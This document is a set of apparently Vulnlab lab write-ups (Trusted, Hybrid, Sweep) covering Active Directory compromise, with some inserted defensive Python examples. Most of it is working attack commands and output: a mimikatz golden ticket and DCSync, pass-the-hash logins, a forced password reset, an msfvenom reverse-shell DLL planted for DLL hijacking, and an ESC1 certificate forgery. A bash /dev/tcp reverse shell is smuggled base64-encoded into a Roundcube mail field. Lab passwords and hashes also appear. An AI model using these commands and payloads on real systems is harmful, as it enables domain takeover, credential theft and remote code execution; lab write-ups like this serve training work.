kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt

All that is left is to DCSync the trusted.vl domain:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

We find:

Credentials:

Object RDN           : Domain Controllers

** SAM ACCOUNT **

SAM Username         : Domain Controllers
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-516
Object Relative ID   : 516

Credentials:

Object RDN           : DomainDnsZones


Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db<REDACTED>72ef

Object RDN           : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret
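
As an added illustration (not from the writeup), the following Python models the SID filtering that the trusting domain's DC applies to the ExtraSids of a ticket crossing this trust, using the two domain SIDs from lsadump::trust above, the /sid and /sids values of the golden ticket command, and the WITHIN_FOREST, non-quarantined trust attributes shown by Get-DomainTrust. It is a simplified reading of the MS-PAC 4.1.2.2 rules (well-known and built-in SIDs are not modelled), and the krbtgt key in the embedded command is replaced by a placeholder.

```python
import re

# Domain SIDs as printed by lsadump::trust above
LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"      # LAB.TRUSTED.VL (child, trusted domain)
TRUSTED_SID = "S-1-5-21-3576695518-347000760-3731839591"   # TRUSTED.VL (forest root, trusting domain)
ENTERPRISE_ADMINS_RID = 519

# The golden-ticket command from above; the krbtgt key is a placeholder here
GOLDEN_CMD = ("kerberos::golden /user:Administrator /krbtgt:REDACTED "
              "/domain:lab.trusted.vl /sid:" + LAB_SID +
              " /sids:" + TRUSTED_SID + "-519 /ptt")

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or (None, None) for well-known SIDs."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)


def parse_golden_args(cmd):
    """Pull the /key:value options out of a mimikatz kerberos::golden command line."""
    args = {}
    for tok in cmd.split():
        if tok.startswith("/") and ":" in tok:
            key, value = tok[1:].split(":", 1)
            args[key] = value
    # /sids is a comma-separated list of extra SIDs placed in the PAC's ExtraSids
    args["sids"] = args["sids"].split(",") if args.get("sids") else []
    return args


def filter_extra_sids(extra_sids, trusted_domain_sid, quarantined):
    """
    Simplified SID filtering. The trusting domain (trusted.vl) receives a ticket
    issued by the trusted domain (lab.trusted.vl). With the QUARANTINED_DOMAIN
    attribute set, only SIDs from the trusted domain's own namespace survive;
    without it (the plain WITHIN_FOREST trust shown above) every SID passes,
    which is why a parent-domain SID carried in the child's ticket is honoured.
    Returns (accepted, dropped).
    """
    accepted, dropped = [], []
    for sid in extra_sids:
        domain, _rid = split_sid(sid)
        if quarantined and domain != trusted_domain_sid:
            dropped.append(sid)
        else:
            accepted.append(sid)
    return accepted, dropped


def grants_enterprise_admin(sids, forest_root_sid):
    """True if the surviving SIDs include Enterprise Admins (RID 519) of the forest root."""
    return any(split_sid(s) == (forest_root_sid, ENTERPRISE_ADMINS_RID) for s in sids)


if __name__ == "__main__":
    args = parse_golden_args(GOLDEN_CMD)
    for quarantined in (False, True):
        kept, dropped = filter_extra_sids(args["sids"], args["sid"], quarantined)
        print(f"quarantined={quarantined}: kept={kept} dropped={dropped} "
              f"-> Enterprise Admin: {grants_enterprise_admin(kept, TRUSTED_SID)}")
```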

And we evil-winrm to the main DC:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
trusted\administrator

Recommended path

Use dnschef together with bloodhound-python, so that every A lookup resolves to the lab DC:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ dnschef --fakeip 10.10.158.230
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org  

(18:52:27) [*] DNSChef started on interface: 127.0.0.1
(18:52:27) [*] Using the following nameservers: 8.8.8.8
(18:52:27) [*] Cooking all A replies to point to 10.10.158.230
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home
(18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
(18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 7 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 47 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labdc.lab.trusted.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20240624185341_bloodhound.zip

BloodHound analysis shows that rsmith can set the password of ewalters:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ rpcclient -U "rsmith" //10.10.192.230

Password for [WORKGROUP\rsmith]:IHateEric2
rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!'
rpcclient $> 

We can verify that the password was actually updated and that we can log in over WinRM:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Puckiestyle@20242024' 
SMB         10.10.192.230   5985   LABDC            [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl)
HTTP        10.10.192.230   5985   LABDC            [*] http://10.10.192.230:5985/wsman
WINRM       10.10.192.230   5985   LABDC            [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!

Then evil-winrm into labdc:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ewalters\Documents> hostname
labdc
*Evil-WinRM* PS C:\Users\ewalters\Documents> 

.

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-smbserver -smb2support share .   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.192.230,59756)
[*] AUTHENTICATE_MESSAGE (\,LABDC)
[*] User LABDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share
The command completed successfully.

*Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe
*Evil-WinRM* PS C:\AVTest> 

After examining KasperskyRemovalTool.exe with Procmon on my Windows box:

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll 
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         6/27/2024   8:19 AM           9216 KasperskyRemovalToolENU.dll
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> 

After a couple of seconds we receive a shell as cpowers (a domain admin):

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 2222 
listening on [any] 2222 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers

C:\Windows\system32>

The scheduled task below was running as user cpowers every minute:

C:\Users\cpowers\Documents>type task.ps1
type task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
C:\Users\cpowers\Documents>
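What that Procmon examination looks for, automated as an added example (not part of the writeup): a parser over a Process Monitor CSV export that reports DLLs a process probes for but never finds, and where in the search order the first probe lands. The column names are Procmon's default export columns, and the sample rows are constructed to mirror the C:\AVTest case; a phantom DLL whose first probe lands in a directory that non-admins can write to is the exposure a defender should close (ship the DLL or lock down the directory), especially when a scheduled task keeps relaunching the binary.

```python
"""Find phantom DLL loads in a Process Monitor CSV export.

Added example, not the writeup's tooling. A DLL that is probed but
never found is resolved from the first writable directory in the
search order, which Windows starts at the application's own folder.
Assumes Procmon's default CSV columns; sample rows are constructed.
"""
import csv
import io
from collections import OrderedDict

# Default-protected locations: only administrators can write here, so a
# first probe in one of these directories is not a hijack exposure.
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows")


def _split(path):
    """Return (directory, basename) of a Windows path, both lower-cased."""
    directory, _, name = path.rpartition("\\")
    return directory.lower(), name.lower()


def find_phantom_dlls(csv_text):
    """Map (process, dll) -> directory of the first probe, for DLLs never found."""
    probes = OrderedDict()  # (process, dll) -> [(result, directory), ...] in order
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile":
            continue
        directory, name = _split(row["Path"])
        if not name.endswith(".dll"):
            continue
        probes.setdefault((row["Process Name"], name), []).append((row["Result"], directory))
    phantoms = OrderedDict()
    for key, events in probes.items():
        if any(result == "SUCCESS" for result, _ in events):
            continue  # the DLL was eventually loaded from some directory
        phantoms[key] = events[0][1]  # first search-order location probed
    return phantoms


def is_unprotected_dir(directory):
    """True unless the directory is one of the admin-only system locations."""
    d = directory.lower().rstrip("\\")
    return not any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def report(csv_text):
    """One line per phantom DLL; REVIEW marks a first probe outside system dirs."""
    lines = []
    for (process, dll), first_dir in find_phantom_dlls(csv_text).items():
        tag = "REVIEW" if is_unprotected_dir(first_dir) else "ok"
        lines.append(f"{tag}: {process} probes {dll} first in {first_dir}")
    return lines


# Constructed sample: the tool looks for an ENU resource DLL that does not
# exist anywhere, and for VERSION.dll, which it does find in System32.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"4:46:01.0000001 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\AVTest\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"4:46:01.0000002 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\Windows\System32\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"4:46:01.0000003 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\Windows\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"4:46:01.0000004 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\AVTest\VERSION.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"4:46:01.0000005 PM","KasperskyRemovalTool.exe","4120","CreateFile","C:\Windows\System32\VERSION.dll","SUCCESS","Desired Access: Read Attributes"
"4:46:01.0000006 PM","KasperskyRemovalTool.exe","4120","RegOpenKey","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KasperskyRemovalTool.exe","NAME NOT FOUND","Desired Access: Query Value"
'''

if __name__ == "__main__":
    for line in report(SAMPLE_CSV):
        print(line)
```

Pair the REVIEW lines with an ACL check of the directory (icacls) to confirm whether non-admin users can actually create files there; the CSV alone cannot tell you that.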

That’s all


vulnlab-hybrid

vulnlab hybrid

A medium Active Directory chain

containing: one AD-joined Ubuntu PC and a Windows DC

Tools used: keytabextract.py

Nmap enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds

.

# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds

.

Through NFS enumeration we find:

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

For the mailing part in Roundcube I used:

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy-AD: find vulnerable templates

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We find an ESC1 vulnerability for Domain Computers. I have a domain-joined MAIL01$ machine; enumerating further on MAIL01$, I found /etc/krb5.keytab, a file that is used to authenticate to Kerberos without any human interaction and without storing the password.

Transferred the krb5.keytab file to my Kali machine and used keytabextract.py to extract information about MAIL01$ and its hashes:

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458
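As an added example (not keytabextract.py's own code), here is a parser for the MIT keytab format that recovers the same fields, run on a keytab constructed in memory for MAIL01$ in HYBRID.VL with made-up keys. It makes the defensive point concrete: the rc4-hmac key stored in the file is the account's NT hash, so the file's permissions are the only thing standing between a reader of the file and a pass-the-hash credential.

```python
"""Parse an MIT Kerberos keytab (format 0x0502) and list the keys in it.

Added example, not keytabextract.py's code. For enctype 23 (rc4-hmac)
the stored key is exactly the NT hash of the account password, which
is why /etc/krb5.keytab on a domain-joined Linux host must stay
readable by root only. The sample keytab is built here with fake keys.
"""
import struct

ENCTYPE_NAMES = {17: "aes128-cts-hmac-sha1-96",
                 18: "aes256-cts-hmac-sha1-96",
                 23: "rc4-hmac"}
KRB5_NT_PRINCIPAL = 1


def _counted(buf, off):
    """Read a counted_octet_string: big-endian uint16 length, then bytes."""
    (length,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + length], off + length


def parse_keytab(data):
    """Return one dict per entry: realm, components, kvno, enctype, key."""
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version: %r" % data[:2])
    entries, off = [], 2
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size <= 0:                 # negative size marks a deleted slot
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off)
            comps.append(comp.decode())
        # name_type(4) timestamp(4) vno8(1) enctype(2), all big-endian
        name_type, timestamp, vno8, enctype = struct.unpack_from(">IIBH", data, off)
        off += 11
        key, off = _counted(data, off)
        # A 32-bit kvno follows the key only when the entry has room for it.
        kvno = struct.unpack_from(">I", data, off)[0] if end - off >= 4 else vno8
        entries.append({"realm": realm.decode(), "components": comps,
                        "name_type": name_type, "timestamp": timestamp,
                        "kvno": kvno, "enctype": enctype, "key": key})
        off = end
    return entries


def _counted_bytes(raw):
    return struct.pack(">H", len(raw)) + raw


def build_keytab(realm, components, kvno, keys, timestamp=0):
    """Serialize {enctype: key} into a 0x0502 keytab (used for the sample)."""
    out = b"\x05\x02"
    for enctype, key in keys.items():
        body = struct.pack(">H", len(components)) + _counted_bytes(realm.encode())
        for comp in components:
            body += _counted_bytes(comp.encode())
        body += struct.pack(">IIBH", KRB5_NT_PRINCIPAL, timestamp, kvno & 0xFF, enctype)
        body += _counted_bytes(key) + struct.pack(">I", kvno)
        out += struct.pack(">i", len(body)) + body
    return out


def summarize(entries):
    """Collapse entries into the view keytabextract prints for one principal."""
    if not entries:
        return {}
    first = entries[0]
    view = {"realm": first["realm"], "principal": "/".join(first["components"]),
            "kvno": first["kvno"], "ntlm": None, "aes256": None, "aes128": None}
    slot = {23: "ntlm", 18: "aes256", 17: "aes128"}  # rc4 key == NT hash
    for entry in entries:
        if entry["enctype"] in slot:
            view[slot[entry["enctype"]]] = entry["key"].hex()
    return view


# Constructed sample: MAIL01$ in HYBRID.VL, kvno 2, three fake keys.
SAMPLE_KEYS = {23: bytes(range(16)), 18: bytes(range(32)), 17: bytes(range(16, 32))}
SAMPLE_KEYTAB = build_keytab("HYBRID.VL", ["MAIL01$"], 2, SAMPLE_KEYS)

if __name__ == "__main__":
    for entry in parse_keytab(SAMPLE_KEYTAB):
        print(ENCTYPE_NAMES.get(entry["enctype"], entry["enctype"]), entry["key"].hex())
    print(summarize(parse_keytab(SAMPLE_KEYTAB)))
```

On a real host, run it against a copy of /etc/krb5.keytab only as root, and treat `ls -l /etc/krb5.keytab` showing anything but mode 0600 as a finding.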


Certipy: request a certificate as MAIL01$ with the administrator UPN:

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

.

┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator


vulnlab-sweep

vulnlab sweep

A medium Windows machine

Tools used: crackmapexec, bloodhound-python, sshesame, evil-winrm

Nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Guest SMB share enumeration and RID brute force

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
